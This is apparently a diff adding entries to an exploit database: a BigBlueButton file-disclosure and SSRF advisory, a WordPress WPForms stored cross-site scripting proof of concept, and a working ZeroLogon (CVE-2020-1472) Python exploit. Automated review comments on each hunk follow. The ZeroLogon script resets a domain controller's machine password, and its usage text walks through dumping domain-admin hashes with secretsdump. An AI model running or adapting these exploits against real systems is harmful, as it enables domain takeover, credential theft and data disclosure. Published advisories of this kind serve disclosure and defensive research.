diff --git a/exploits/multiple/webapps/49070.txt b/exploits/multiple/webapps/49070.txt new file mode 100644 index 000000000..7a90d859a --- /dev/null +++ b/exploits/multiple/webapps/49070.txt 
@@ -0,0 +1,237 @@ +# Exploit Title: BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery +# Date: 2020-09-11 +# Exploit Author: RedTeam Pentesting GmbH +# Vendor Homepage: https://bigbluebutton.org/ +# Version: BigBlueButton 2.2.25 + + +RedTeam Pentesting discovered a vulnerability in the BigBlueButton web +conferencing system which allows participants of a conference with +permissions to upload presentations to read arbitrary files from the +file system and perform server-side requests. This leads to +administrative access to the BigBlueButton instance. + + +Details +======= + +Product: BigBlueButton +Affected Versions: 2.2.25, potentially earlier versions as well +Fixed Versions: 2.2.27 +Vulnerability Type: Arbitrary File Disclosure and + Server-Side Request Forgery +Security Risk: medium +Vendor URL: https://bigbluebutton.org/ +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-005 +Advisory Status: published +CVE: CVE-2020-25820 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25820 + + +Introduction +============ + +"BigBlueButton is a web conferencing system designed for online +learning." + +(from the vendor's homepage) + + +More Details +============ + +BigBlueButton is a web conferencing system that allows participants with +the appropriate privileges to upload files in various formats to be used +as presentation slides. Among other formats, BigBlueButton accepts +LibreOffice documents[1]. LibreOffice documents use the XML-based Open +Document Format for Office Applications (ODF)[2]. For technical +purposes, uploaded files are converted to PDF format with LibreOffice +and afterwards to SVG for displaying[6]. + +The ODF file format supports using the XML Linking Language (XLink) to +create links between documents[3]. 
When local files are referenced using +XLinks, the contents of the respective files are included in the +generated PDF file when BigBlueButton converts ODF documents with +LibreOffice. This leads to an arbitrary file disclosure vulnerability, +allowing malicious participants of conferences to extract files from the +BigBlueButton server's file system. + +LibreOffice also embeds XLinks to remote locations when a document is +converted, which allows to perform server-side requests. + + +Proof of Concept +================ + +Start from an empty ODF Text Document and extract the content: + +$ mkdir tmp-doc && cd tmp-doc +$ unzip ../empty.odt +Archive: empty.odt + extracting: mimetype + creating: Configurations2/accelerator/ + creating: Configurations2/images/Bitmaps/ + creating: Configurations2/toolpanel/ + creating: Configurations2/progressbar/ + creating: Configurations2/statusbar/ + creating: Configurations2/toolbar/ + creating: Configurations2/floater/ + creating: Configurations2/popupmenu/ + creating: Configurations2/menubar/ + inflating: manifest.rdf + inflating: meta.xml + inflating: settings.xml + extracting: Thumbnails/thumbnail.png + inflating: styles.xml + inflating: content.xml + inflating: META-INF/manifest.xml + + +Replace the element in the file content.xml with the +following: + + + + + + + + + +The text document now includes a section that references the external +file /etc/passwd. Create an new ODF Text Document with the modified +content: + +$ zip -r ../modified.odt * + +The document can now be uploaded as a presentation. After the +conversion, the presentation shows the contents of the file +/etc/passwd from the system running the BigBlueButton conferencing +software. To perform server-side requests, substitute the xlink:href +attribute's value with a remote URL such as http://example.com: + + + + + + + + + +When converting a document with this content, LibreOffice will fetch the +website's content and embed it into the generated PDF file. 
+ + +Workaround +========== + +To work around this issue, the conversion feature should be disabled if +it is not used. Otherwise, permission to upload presentations should +only be given to trusted users. Additionally, the allowed file types for +upload can be restricted to just PDF files. + + +Fix +=== + +Update to fixed version 2.2.27. Change API key after update. + + + +Security Risk +============= + +As shown, the presentation conversion feature of BigBlueButton can be +used to disclose arbitrary local files. Through the file disclosure, +attackers can gain access to the credentials of the BigBlueButton +instance (/usr/share/bbb-web/WEB-INF/classes/bigbluebutton.properties, +/usr/share/bbb-apps-akka/conf/application.conf), which allows for +administrative access to BigBlueButton through its API (see [5]), +including all conferences. + +Additionally, it is possible to perform server-side requests. Note that +this vulnerability is different from CVE-2018-10583 [4], because the +risk is not the disclosure of credentials sent while fetching remote +resources, but the ability to access resources that are in the same +network segment as the BigBlueButton instance, which is possibly not +accessible from the Internet. + +To exploit this vulnerability, attackers need to have access to a +conference with the ability to upload presentations. While successful +exploitation of this vulnerability would pose severe consequences for +the affected BigBlueButton instance, it is only rated to pose a medium +risk due to the requirement of having presentator access. 
+ + +Timeline +======== + +2020-09-11 Vulnerability identified +2020-09-18 Customer approved disclosure to vendor +2020-09-22 CVE ID requested +2020-09-22 CVE ID assigned +2020-09-24 Requested encrypted communication with vendor +2020-09-25 Vendor unable to provide encrypted communication, + Vendor notified +2020-09-25 Vendor confirmed being able to reproduce vulnerability, + mentioned similar bugreport +2020-09-25 Requested information whether "similar burgreport" + uses the same vulnerability - no answer +2020-10-13 Again requested information whether "similar burgreport" + uses the same vulnerability, whether release shedule is + known - no answer +2020-10-14 Vendor released fixed version (without mentioning vulnerability) +2020-10-21 Vulnerability published by third party [7] +2020-10-21 Advisory released + + +References +========== + +[1] https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton +[2] http://opendocumentformat.org/ +[3] https://www.w3.org/TR/xlink11/ +[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583 +[5] https://docs.bigbluebutton.org/dev/api.html#usage +[6] https://docs.bigbluebutton.org/support/faq.html#presentations +[7] https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. 
+ +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://www.redteam-pentesting.de/jobs/ + +-- +RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Dennewartstr. 25-27 Fax : +49 241 510081-99 +52068 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/php/webapps/49069.txt b/exploits/php/webapps/49069.txt new file mode 100644 index 000000000..55e68f2ef --- /dev/null +++ b/exploits/php/webapps/49069.txt 
@@ -0,0 +1,44 @@ +#Exploit Title : Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated) +#Exploit Author : ZwX +#Exploit Date : 2020-10-23 +#Vendor Homepage : https://wpforms.com/ +#Download Plugin : https://downloads.wordpress.org/plugin/wpforms-lite.1.6.3.1.zip + + +[+] Description Vulnerability: +============================== + +A Cross Site Scripting vulnerability is located in the Wordpress plugin [WPForms] which affects version 1.6.3.1 and other versions lower. +To exploit the vulnerability it is necessary to be identified, the attacker could hide JavaScript code without the knowledge of the owner of the site. + + +[+] Proof Of Concept: +===================== + +# HTML Code # + + + + + +# Methode POST # + +POST /wp-admin/admin-ajax.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/wp-admin/admin.php?page=wpforms-builder&view=fields&form_id=990 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 7081 +Origin: http://localhost +Connection: close + 
+action=wpforms_save_form&data=[{"name":"id","value":"990"},{"name":"field_id","value":"5"},{"name":"fields[0][id]","value":"0"},{"name":"fields[0][type]","value":"name"},{"name":"fields[0][label]","value":"Nom"},{"name":"fields[0][format]","value":"first-last"},{"name":"fields[0][description]","value":""},{"name":"fields[0][required]","value":"1"},{"name":"fields[0][size]","value":"medium"},{"name":"fields[0][simple_placeholder]","value":""},{"name":"fields[0][simple_default]","value":""},{"name":"fields[0][first_placeholder]","value":""},{"name":"fields[0][first_default]","value":""},{"name":"fields[0][middle_placeholder]","value":""},{"name":"fields[0][middle_default]","value":""},{"name":"fields[0][last_placeholder]","value":""},{"name":"fields[0][last_default]","value":""},{"name":"fields[0][css]","value":""},{"name":"fields[1][id]","value":"1"},{"name":"fields[1][type]","value":"email"},{"name":"fields[1][label]","value":"E-mail"},{"name":"fields[1][description]","value":""},{"name":"fields[1][required]","value":"1"},{"name":"fields[1][size]","value":"medium"},{"name":"fields[1][placeholder]","value":""},{"name":"fields[1][confirmation_placeholder]","value":""},{"name":"fields[1][default_value]","value":""},{"name":"fields[1][css]","value":""},{"name":"fields[1][filter_type]","value":""},{"name":"fields[1][allowlist]","value":""},{"name":"fields[1][denylist]","value":""},{"name":"fields[2][id]","value":"2"},{"name":"fields[2][type]","value":"textarea"},{"name":"fields[2][label]","value":"Commentaire ou 
message"},{"name":"fields[2][description]","value":""},{"name":"fields[2][required]","value":"1"},{"name":"fields[2][size]","value":"medium"},{"name":"fields[2][placeholder]","value":""},{"name":"fields[2][limit_count]","value":"1"},{"name":"fields[2][limit_mode]","value":"characters"},{"name":"fields[2][default_value]","value":""},{"name":"fields[2][css]","value":""},{"name":"fields[3][id]","value":"3"},{"name":"fields[3][type]","value":"textarea"},{"name":"fields[3][label]","value":"Paragraphe"},{"name":"fields[3][description]","value":""},{"name":"fields[3][size]","value":"medium"},{"name":"fields[3][placeholder]","value":""},{"name":"fields[3][limit_count]","value":"1"},{"name":"fields[3][limit_mode]","value":"characters"},{"name":"fields[3][default_value]","value":""},{"name":"fields[3][css]","value":""},{"name":"fields[4][id]","value":"4"},{"name":"fields[4][type]","value":"textarea"},{"name":"fields[4][label]","value":"Paragraphe"},{"name":"fields[4][description]","value":""},{"name":"fields[4][size]","value":"medium"},{"name":"fields[4][placeholder]","value":""},{"name":"fields[4][limit_count]","value":"1"},{"name":"fields[4][limit_mode]","value":"characters"},{"name":"fields[4][default_value]","value":""},{"name":"fields[4][css]","value":""},{"name":"settings[form_title]","value":"Formulaire de contact simple"},{"name":"settings[form_desc]","value":""},{"name":"settings[form_class]","value":""},{"name":"settings[submit_text]","value":"Envoyer"},{"name":"settings[submit_text_processing]","value":"Envoi..."},{"name":"settings[submit_class]","value":""},{"name":"settings[antispam]","value":"1"},{"name":"settings[notification_enable]","value":"1"},{"name":"settings[notifications][1][email]","value":"{admin_email}"},{"name":"settings[notifications][1][subject]","value":"Nouvelle entrée : Formulaire de contact simple"},{"name":"settings[notifications][1][sender_name]","value":"Le Blog de 
ZwX"},{"name":"settings[notifications][1][sender_address]","value":"{admin_email}"},{"name":"settings[notifications][1][replyto]","value":"{field_id=\"1\"}"},{"name":"settings[notifications][1][message]","value":"{all_fields}"},{"name":"settings[confirmations][1][type]","value":"message"},{"name":"settings[confirmations][1][message]","value":"

Merci de nous avoir contacté ! Nous vous contacterons rapidement.

"},{"name":"settings[confirmations][1][message_scroll]","value":"1"},{"name":"settings[confirmations][1][page]","value":"262"},{"name":"settings[confirmations][1][redirect]","value":""}]&id=990&nonce=ec15a26a5a + + +# URL Proof Of Concept # + +http://localhost/?wpforms_form_preview=990 \ No newline at end of file diff --git a/exploits/windows/remote/49071.py b/exploits/windows/remote/49071.py new file mode 100755 index 000000000..e3ee1df1e --- /dev/null +++ b/exploits/windows/remote/49071.py 
@@ -0,0 +1,275 @@ +# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege +# Date: 2020-10-04 +# Exploit Author: West Shepherd +# Vendor Homepage: https://www.microsoft.com +# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2 +# Tested on: Microsoft Windows Server 2016 Standard x64 +# CVE : CVE-2020-1472 +# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code +# Sources: https://www.secura.com/pathtoimg.php?id=2055 +# Requirements: python3 and impacket 0.9.21+ (tested using this version) +#!/usr/bin/env python3 +import hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs +from binascii import hexlify, unhexlify +from subprocess import check_call +from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED +from impacket.dcerpc.v5 import nrpc, epm, transport +from impacket import crypto, version +from impacket.examples import logger +from Cryptodome.Cipher import AES +from struct import pack, unpack +from impacket.dcerpc.v5.rpcrt import DCERPCException + + +class Exploit: + def __init__( + self, + name='', + address='', + attempts=2000, + password='' + ): + name = name.rstrip('$') + self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\ + .ServerSecureChannel + self.authenticator = self.getAuthenticator(stamp=0) + self.clearNewPasswordBlob = b'\x00' * 516 + self.primaryName = ('\\\\%s' % name) + '\x00' + self.accountName = ('%s$' % name) + '\x00' + self.computerName = name + '\x00' + self.clientCredential = b'\x00' * 8 + self.clientChallenge = b'\x00' * 8 + self.negotiateFlags = 0x212fffff + self.address = address + self.max = attempts + self.dce = None + self.sessionKey = None + self.clientStoredCredential = None + self.password = password + + def encodePassword(self, password): + if isinstance(password, str): + password = password.encode('utf-8') + return b'\x00' * (512 - len(password))\ + + password \ + + pack(' -ip + + 2. 
Exploit the DC - this will break the DC until restored: + cve-2020-1472.py -do exploit -ip + + 3. Dump the DC - for the DA hashes, this will not contain the +machine hex-pass: + secretsdump.py -just-dc -no-pass \$@ + + 4. Dump the DC again - use the DA hash to get the machines hex-pass: + secretsdump.py -no-pass -hashes : /@ + + 5. Restore target - this fixes the DC: + cve-2020-1472.py -do restore -target -ip +-hex +""" + parser = argparse.ArgumentParser( + description='CVE-2020-1472 ZeroLogon Exploit - Netlogon +Elevation of Privilege', + add_help=True + ) + try: + parser.add_argument('-do', default='check', action='store', + help='What to do (default check): +[check|restore|exploit]') + parser.add_argument('-target', action='store', + help='NETBIOS name of target DC (not the FQDN)') + parser.add_argument('-ip', action='store', + help='IP address of target DC') + parser.add_argument('-password', default='', action='store', + help='The plaintext password to use to +reset the DC') + parser.add_argument('-hex', default='', action='store', + help='The hex password to use to restore +the DC (recommended)') + parser.add_argument('-max', default=2000, action='store', + help='Max attempts to authenticate with +the DC (usually ~300 or less)') + + if len(sys.argv) < 3: + parser.print_help() + print(info) + sys.exit(1) + options = parser.parse_args() + + if options.do.lower() == 'check': + Exploit( + name=options.target, + address=options.ip, + attempts=int(options.max) + ).authenticate() + elif options.do.lower() == 'exploit': + exp = Exploit( + name=options.target, + address=options.ip, + attempts=int(options.max) + ) + if exp.authenticate(): + exp.exploit() + elif options.do.lower() == 'restore': + if options.hex != '' and options.password == '': + options.password = unhexlify(options.hex) + if options.password != '': + exp = Exploit( + name=options.target, + address=options.ip, + password=options.password + ).restore() + else: + parser.print_help() + + except Exception 
as error: + sys.stderr.write('[-] error in main %s\n' % str(error)) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b87781e04..acdc509c0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18298,6 +18298,7 @@ id,file,description,date,author,type,platform,port 48661,exploits/linux/remote/48661.sh,"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution",2020-07-10,SpicyItalian,remote,linux, 49067,exploits/multiple/remote/49067.py,"Aerospike Database 5.1.0.3 - OS Command Execution",2020-11-17,"Matt S",remote,multiple, 49068,exploits/multiple/remote/49068.py,"Apache Struts 2.5.20 - Double OGNL evaluation",2020-11-17,"West Shepherd",remote,multiple, +49071,exploits/windows/remote/49071.py,"ZeroLogon - Netlogon Elevation of Privilege",2020-11-18,"West Shepherd",remote,windows, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 
@@ -43296,3 +43297,5 @@ id,file,description,date,author,type,platform,port 48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php, 48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php, 49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php, +49069,exploits/php/webapps/49069.txt,"Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)",2020-11-18,ZwX,webapps,php, +49070,exploits/multiple/webapps/49070.txt,"BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery",2020-11-18,"RedTeam Pentesting GmbH",webapps,multiple,
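Review bot: The hunk adding exploits/multiple/webapps/49070.txt ships a proof of concept that cannot be followed as committed: the sentence "Replace the element in the file content.xml with the following:" names no element, and both XML fragments that should follow it (the one referencing /etc/passwd and the one using http://example.com as the xlink:href value) are empty lines, so the content.xml fragment needs to be restored or the reader pointed at the advisory URL for it. The Fix section's "Change API key after update." should say why, namely that the credentials in /usr/share/bbb-web/WEB-INF/classes/bigbluebutton.properties and /usr/share/bbb-apps-akka/conf/application.conf named under Security Risk may already have been disclosed before the update, which is the reason rotation is part of remediation and not optional. Minor text defects: "Create an new ODF Text Document", "burgreport" (twice), "shedule" and "presentator" in the Timeline and Security Risk sections.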
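Review bot: The hunk adding exploits/php/webapps/49069.txt is incomplete as evidence: the "# HTML Code #" block is empty, and the settings[confirmations][1][message] value in the quoted POST body contains only the plain text "Merci de nous avoir contacté ! Nous vous contacterons rapidement." with no markup, so the file shows neither what is stored nor what renders at the preview URL. The description should name the affected setting (the confirmation message saved through the wpforms_save_form action, as the request shows), give the vendor status or fixed version (absent; only "1.6.3.1 and other versions lower" is stated), and mark form_id=990 and nonce=ec15a26a5a as instance-specific values that differ per site. Wording: "it is necessary to be identified" should read "authenticated" as in the title, and "Methode" should be "Method".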
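Review bot: In the hunk adding exploits/windows/remote/49071.py the shebang "#!/usr/bin/env python3" comes after the ten header comment lines instead of on line 1, so it has no effect even though the file is committed with mode 100755; move it to the first line and keep the header comments below it. The usage text in main refers to the script as cve-2020-1472.py while the committed name is 49071.py, and the "-max" help text says "usually ~300 or less" while the default is 2000, so the documentation should be reconciled with the file. Given the usage text's own warning that "exploit" "will break the DC until restored", the exploit branch should require an explicit confirmation rather than run on the bare "-do exploit" switch, and the restore branch assigns "exp = Exploit(...).restore()" but never uses exp, which is misleading. The header claims Server 2008 R2 through Server 2019 while "Tested on" lists only Server 2016 Standard x64; the untested versions should be marked as such. The bare "except Exception as error" in main discards the traceback, which makes failed restores hard to diagnose; at least log it at debug level.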
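Review bot: In the first files_exploits.csv hunk the new row for 49071 carries date 2020-11-18 while the header of 49071.py says "Date: 2020-10-04"; if the CSV column is the publication date rather than the file's date, document that convention, otherwise correct one of the two. The row is also inserted between the multiple/remote entries 49067 and 49068 and the php/webapps block that begins with id 6, rather than next to other windows/remote rows; confirm that this placement matches the file's intended ordering, since the surrounding context is not sorted by id.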
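Review bot: In the second files_exploits.csv hunk the appended 49069 row keeps the file's spelling "Wordpress Plugin WPForms ... Persistent Cross Site Scripting" while the adjacent 49063 row uses "Cross-Site Scripting"; normalising to the existing form would keep searches on the description column consistent. The 49070 row records only the title, so CVE-2020-25820 from the advisory is not searchable in the index; acceptable if the CSV has no CVE column by design, but worth stating. Both rows leave the trailing port field empty, consistent with the neighbouring webapps rows.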